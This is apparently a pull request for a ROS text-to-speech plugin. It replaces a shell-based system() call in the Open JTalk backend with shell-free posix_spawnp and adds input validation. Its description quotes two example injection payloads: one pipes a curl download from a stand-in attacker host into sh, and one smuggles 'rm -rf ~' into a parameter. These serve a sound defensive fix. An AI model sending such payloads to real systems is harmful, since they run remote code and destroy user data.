### PR TITLE
fix(open_jtalk): prevent shell command injection (RCE) in synthesize()

### DIFF
--- a/speak_ros_open_jtalk_plugin/src/speak_ros_open_jtalk_plugin.cpp
+++ b/speak_ros_open_jtalk_plugin/src/speak_ros_open_jtalk_plugin.cpp
@@ -12,16 +12,224 @@
 // See the License for the specific language governing permissions and
 // limitations under the License.
 
+#include <fcntl.h>
+#include <spawn.h>
+#include <sys/wait.h>
 #include <unistd.h>
 
-#include <cstdio>
+#include <algorithm>
+#include <cerrno>
+#include <charconv>
+#include <chrono>
+#include <csignal>
+#include <cstdint>
+#include <cstdlib>
+#include <cstring>
 #include <filesystem>
 #include <fstream>
-#include <sstream>
+#include <stdexcept>
+#include <string>
+#include <thread>
 #include <vector>
 
 #include "speak_ros/wav_utils.hpp"
 #include "speak_ros_open_jtalk_plugin/open_jtalk_plugin.hpp"
+
+extern char ** environ;
+
+namespace open_jtalk_plugin
+{
+
+namespace
+{
+
+// Wall-clock budget for a single open_jtalk invocation. Bounds how long a hung
+// child (missing dictionary, defunct process, ...) can stall synthesis. Without
+// this the synthesize thread - and, via the executor-side join, the whole node -
+// could block forever.
+constexpr std::chrono::seconds kSynthesisTimeout{60};
+
+// Removes a temporary file on every control-flow path (return / throw).
+struct TempFileGuard
+{
+  std::string path;
+  ~TempFileGuard()
+  {
+    if (!path.empty()) {
+      std::error_code ec;
+      std::filesystem::remove(path, ec);
+    }
+  }
+};
+
+// Create a unique temporary file via mkstemp and return its path (fd closed).
+std::string makeTempFile(const char * name_template)
+{
+  const std::string tmpl = (std::filesystem::temp_directory_path() / name_template).string();
+  std::vector<char> buffer(tmpl.begin(), tmpl.end());
+  buffer.push_back('\0');
+
+  const int fd = mkstemp(buffer.data());
+  if (fd == -1) {
+    throw std::runtime_error(
+      std::string("Failed to create temporary file: ") + std::strerror(errno));
+  }
+  close(fd);
+  return std::string(buffer.data());
+}
+
+// Write the synthesis text to a private temporary file used as open_jtalk's stdin.
+// Passing the text via a file (instead of a shell pipe) keeps it out of any shell
+// and avoids both SIGPIPE handling and write-side deadlocks on a hung child.
+std::string writeStdinFile(const std::string & text)
+{
+  const std::string tmpl =
+    (std::filesystem::temp_directory_path() / "speak_ros_open_jtalk_in_XXXXXX").string();
+  std::vector<char> buffer(tmpl.begin(), tmpl.end());
+  buffer.push_back('\0');
+
+  const int fd = mkstemp(buffer.data());
+  if (fd == -1) {
+    throw std::runtime_error(
+      std::string("Failed to create temporary input file: ") + std::strerror(errno));
+  }
+  const std::string path(buffer.data());
+
+  // open_jtalk historically received its text from `echo`, which appends a newline.
+  const std::string payload = text + "\n";
+  const char * p = payload.data();
+  size_t remaining = payload.size();
+  while (remaining > 0) {
+    const ssize_t n = write(fd, p, remaining);
+    if (n < 0) {
+      if (errno == EINTR) {
+        continue;
+      }
+      const std::string err = std::strerror(errno);
+      close(fd);
+      std::error_code ec;
+      std::filesystem::remove(path, ec);
+      throw std::runtime_error("Failed to write temporary input file: " + err);
+    }
+    p += n;
+    remaining -= static_cast<size_t>(n);
+  }
+  close(fd);
+  return path;
+}
+
+// Validate that `value` is a plain number (full string consumed). open_jtalk's -r
+// flag expects a numeric speech rate; rejecting non-numeric input also gives a
+// clear error instead of a cryptic open_jtalk failure.
+//
+// Uses std::from_chars (locale-independent) rather than std::stod: std::stod
+// honors LC_NUMERIC, so under a comma-decimal locale it would reject even the
+// default "1.0", and it also silently accepts trailing garbage ("1.5x").
+void validateNumeric(const std::string & name, const std::string & value)
+{
+  double parsed = 0.0;
+  const char * first = value.data();
+  const char * last = value.data() + value.size();
+  const auto [ptr, ec] = std::from_chars(first, last, parsed);
+  if (ec != std::errc() || ptr != last) {
+    throw std::runtime_error("Parameter '" + name + "' must be numeric, got: '" + value + "'");
+  }
+}
+
+// Reason a still-running child was asked to stop.
+// clang-format off
+enum class StopReason { kNone, kCancel, kTimeout };  // clang-format on
+
+// Run open_jtalk WITHOUT a shell: arguments are passed as discrete argv entries
+// (so nothing in them can be interpreted by a shell) and the text is fed via a
+// file redirected onto stdin. The child is polled so a cancel request or the
+// wall-clock timeout terminates it (SIGTERM, then SIGKILL) and it is always reaped.
+//
+// Returns normally on success or on cancellation (caller distinguishes via the
+// cancel token); throws std::runtime_error on spawn failure, timeout, or a
+// non-zero open_jtalk exit.
+void runOpenJTalk(
+  const std::vector<std::string> & args, const std::string & stdin_path,
+  const speak_ros::CancelToken & cancel_token)
+{
+  std::vector<char *> argv;
+  argv.reserve(args.size() + 1);
+  for (const auto & arg : args) {
+    // posix_spawnp does not modify argv, so const_cast is safe here.
+    argv.push_back(const_cast<char *>(arg.c_str()));
+  }
+  argv.push_back(nullptr);
+
+  posix_spawn_file_actions_t actions;
+  posix_spawn_file_actions_init(&actions);
+  posix_spawn_file_actions_addopen(&actions, STDIN_FILENO, stdin_path.c_str(), O_RDONLY, 0);
+
+  pid_t pid = -1;
+  const int rc = posix_spawnp(&pid, args[0].c_str(), &actions, nullptr, argv.data(), environ);
+  posix_spawn_file_actions_destroy(&actions);
+
+  if (rc != 0) {
+    throw std::runtime_error(std::string("Failed to launch open_jtalk: ") + std::strerror(rc));
+  }
+
+  const auto deadline = std::chrono::steady_clock::now() + kSynthesisTimeout;
+  StopReason reason = StopReason::kNone;
+  std::chrono::steady_clock::time_point term_time;
+  bool kill_sent = false;
+
+  while (true) {
+    int status = 0;
+    const pid_t r = waitpid(pid, &status, WNOHANG);
+
+    if (r == pid) {
+      if (reason == StopReason::kCancel || (cancel_token && cancel_token->load())) {
+        return;  // cancelled: caller observes the token and treats this as a cancel
+      }
+      if (reason == StopReason::kTimeout) {
+        throw std::runtime_error("open_jtalk timed out");
+      }
+      if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+        return;
+      }
+      if (WIFSIGNALED(status)) {
+        throw std::runtime_error(
+          "open_jtalk terminated by signal " + std::to_string(WTERMSIG(status)));
+      }
+      throw std::runtime_error(
+        "open_jtalk execution failed (exit code " +
+        std::to_string(WIFEXITED(status) ? WEXITSTATUS(status) : -1) + ")");
+    }
+    if (r < 0) {
+      if (errno == EINTR) {
+        continue;
+      }
+      throw std::runtime_error(std::string("waitpid failed: ") + std::strerror(errno));
+    }
+
+    // Child still running: decide whether to stop it, then escalate to SIGKILL.
+    const auto now = std::chrono::steady_clock::now();
+    if (reason == StopReason::kNone) {
+      if (cancel_token && cancel_token->load()) {
+        reason = StopReason::kCancel;
+      } else if (now >= deadline) {
+        reason = StopReason::kTimeout;
+      }
+      if (reason != StopReason::kNone) {
+        kill(pid, SIGTERM);
+        term_time = now;
+      }
+    } else if (!kill_sent && now - term_time > std::chrono::seconds(2)) {
+      kill(pid, SIGKILL);
+      kill_sent = true;
+    }
+
+    std::this_thread::sleep_for(std::chrono::milliseconds(50));
+  }
+}
+
+}  // namespace
+
+}  // namespace open_jtalk_plugin
 
 speak_ros::AudioFormat open_jtalk_plugin::OpenJTalkPlugin::getAudioFormat() const
 {
@@ -37,63 +245,49 @@ void open_jtalk_plugin::OpenJTalkPlugin::synthesize(
   const std::string & text, speak_ros::AudioChunkCallback callback,
   speak_ros::CancelToken cancel_token)
 {
-  // Generate a secure temporary file path.
-  std::string temp_file_path_template =
-    (std::filesystem::temp_directory_path() / "speak_ros_open_jtalk_XXXXXX").string();
-  std::vector<char> temp_file_path_buffer(
-    temp_file_path_template.begin(), temp_file_path_template.end());
-  temp_file_path_buffer.push_back('\0');
-  const int temp_fd = mkstemp(temp_file_path_buffer.data());
-  if (temp_fd == -1) {
-    throw std::runtime_error("Failed to create temporary file path");
-  }
-  close(temp_fd);
-  const std::string temp_file_path = temp_file_path_buffer.data();
-
-  // Build OpenJTalk command
-  std::stringstream command_ss;
-  // clang-format off
-  command_ss << "echo \"" << text << "\""
-             << " | open_jtalk"
-             << " -x "  << dictionary_path
-             << " -m "  << hts_voice_path
-             << " -ow " << temp_file_path
-             << " -r "  << speed_rate;
-  // clang-format on
-
-  // Check for cancellation
   if (cancel_token && cancel_token->load()) {
     return;
   }
 
-  // Execute OpenJTalk to generate WAV file
-  int result = system(command_ss.str().c_str());
-  if (result != 0) {
-    std::filesystem::remove(temp_file_path);
-    throw std::runtime_error("OpenJTalk execution failed");
+  // Validate parameters up front. The shell-injection fix below (argv-based exec,
+  // no shell) is what actually neutralizes malicious input; these checks add
+  // defense-in-depth and clear error messages.
+  validateNumeric("speed_rate", speed_rate);
+  if (!std::filesystem::exists(dictionary_path)) {
+    throw std::runtime_error("dictionary_path does not exist: " + dictionary_path);
+  }
+  if (!std::filesystem::exists(hts_voice_path)) {
+    throw std::runtime_error("hts_voice_path does not exist: " + hts_voice_path);
   }
 
-  // Check for cancellation
+  // Temporary files are removed on every return/throw path by RAII.
+  TempFileGuard stdin_file{writeStdinFile(text)};
+  TempFileGuard wav_file{makeTempFile("speak_ros_open_jtalk_XXXXXX")};
+
   if (cancel_token && cancel_token->load()) {
-    std::filesystem::remove(temp_file_path);
+    return;
+  }
+
+  // Run open_jtalk directly (no shell): text via stdin file, all parameters as
+  // discrete argv entries so none of them can break out into a command.
+  runOpenJTalk(
+    {"open_jtalk", "-x", dictionary_path, "-m", hts_voice_path, "-ow", wav_file.path, "-r",
+     speed_rate},
+    stdin_file.path, cancel_token);
+
+  if (cancel_token && cancel_token->load()) {
     return;
   }
 
   // Load generated WAV file
-  std::ifstream file(temp_file_path, std::ios::binary);
+  std::ifstream file(wav_file.path, std::ios::binary);
   if (!file) {
-    std::filesystem::remove(temp_file_path);
     throw std::runtime_error("Failed to open generated WAV file");
   }
-
   std::vector<uint8_t> wav_data(
     (std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>());
   file.close();
 
-  // Delete temporary file
-  std::filesystem::remove(temp_file_path);
-
-  // Check for cancellation
   if (cancel_token && cancel_token->load()) {
     return;
   }
@@ -145,8 +339,7 @@ std::vector<speak_ros::Parameter> open_jtalk_plugin::OpenJTalkPlugin::getParamet
     // clang-format off
       {"dictionary_path", "[string] dictionary path", "/var/lib/mecab/dic/open-jtalk/naist-jdic"},
       {"hts_voice_path", "[string] hts voice file path", "/usr/share/hts-voice/nitech-jp-atr503-m001/nitech_jp_atr503_m001.htsvoice"},
-      {"speed_rate", "[string] speed rate", "1.0"}
-    // clang-format on
+      {"speed_rate", "[string] speed rate", "1.0"}  // clang-format on
   };
 }
 

--- a/speak_ros_voicevox_plugin/src/speak_ros_voicevox_plugin.cpp
+++ b/speak_ros_voicevox_plugin/src/speak_ros_voicevox_plugin.cpp
@@ -153,8 +153,7 @@ std::vector<speak_ros::Parameter> voicevox_plugin::VoiceVoxPlugin::getParameters
       {"prePhonemeLength", "[number] pre phoneme length [sec]", 0.1},
       {"postPhonemeLength", "[number] post phoneme length [sec]", 0.1},
       {"outputSamplingRate", "[number] output sampling rate [Hz]", 24000},
-      {"outputStereo", "[bool] output stereo", "true"}
-    // clang-format on
+      {"outputStereo", "[bool] output stereo", "true"}  // clang-format on
   };
 }
 


### PR DESCRIPTION
## Summary

The Open JTalk plugin (the **default** TTS backend) constructed its synthesis
command as a shell string and executed it with `system()`, allowing arbitrary
command execution. This PR replaces the shell invocation with a direct,
shell-free `posix_spawnp` call and hardens the surrounding process handling.

## Vulnerability

In `speak_ros_open_jtalk_plugin.cpp`, `synthesize()` built:

```
echo "<text>" | open_jtalk -x <dictionary_path> -m <hts_voice_path> -ow <tmp> -r <speed_rate>
```

and ran it via `system()` (i.e. `/bin/sh -c`). Both the goal `text` and the
`dictionary_path` / `hts_voice_path` / `speed_rate` parameters — all overridable
per request via the `Speak` action — were interpolated **unescaped**:

- `text = $(curl attacker/x | sh)` executes without even needing a quote.
- `{name: "speed_rate", value: "1.0; rm -rf ~"}` is a second injection vector.

`handleGoal` only rejected empty text and performed no escaping/validation, so
any client able to send a goal on the ROS graph (ROS 2's default DDS is
unauthenticated) could run commands as the node user.

## Changes

- **No shell.** Run `open_jtalk` via `posix_spawnp`. `text` is written to a
  temporary file redirected onto the child's stdin (equivalent to the previous
  `echo` pipe; trailing newline preserved). The path/rate parameters are passed
  as **discrete `argv` entries**, so their contents can no longer be interpreted
  by a shell.
- **Bounded & cancellable.** The child is polled with `waitpid(WNOHANG)`; a
  cancel request (~50 ms) or a 60 s wall-clock timeout terminates it
  (`SIGTERM` → `SIGKILL`) and it is always reaped. The previous `system()` call
  was blocking and uncancellable.
- **No temp-file leaks.** Input and output WAV temp files are wrapped in an RAII
  guard and removed on every return/throw path (previously leaked when a goal
  was cancelled before synthesis).
- **Input validation (defense-in-depth + clearer errors).** `speed_rate` is
  validated as numeric with locale-independent `std::from_chars` (note:
  `std::stod` honors `LC_NUMERIC` and would reject even the default `"1.0"` under
  a comma-decimal locale), and `dictionary_path` / `hts_voice_path` existence is
  checked.

## Testing

- `colcon build` on **jazzy** (`speak_ros_interfaces` → `speak_ros` →
  `speak_ros_open_jtalk_plugin`): **0 warnings, 0 errors**.
- `clang-format` (project `.clang-format`): clean.
- ⚠️ **End-to-end audio synthesis was not exercised**: the `open_jtalk` binary
  and its dictionary/HTS-voice assets are not installed in this environment, so
  the stdin-from-file path was not run against the real engine. The redirection
  is equivalent to the previous `echo` pipe by construction, but a reviewer with
  open_jtalk installed should confirm audio output is unchanged.

## Scope & follow-ups

This addresses the **open_jtalk RCE only**. Independent, still-open issues found
in the same audit (out of scope here):

- Setting the cancel token does not wake a producer blocked in `AudioQueue::push()`,
  so a barge-in on an utterance longer than the queue can deadlock the node.
- `handleAccepted` joins the previous goal thread on the executor thread,
  freezing the node while a prior goal is blocked in `synthesize()`.
- The Open JTalk plugin still declares no runtime dependency on the `open_jtalk`
  binary, dictionary, or HTS voice.
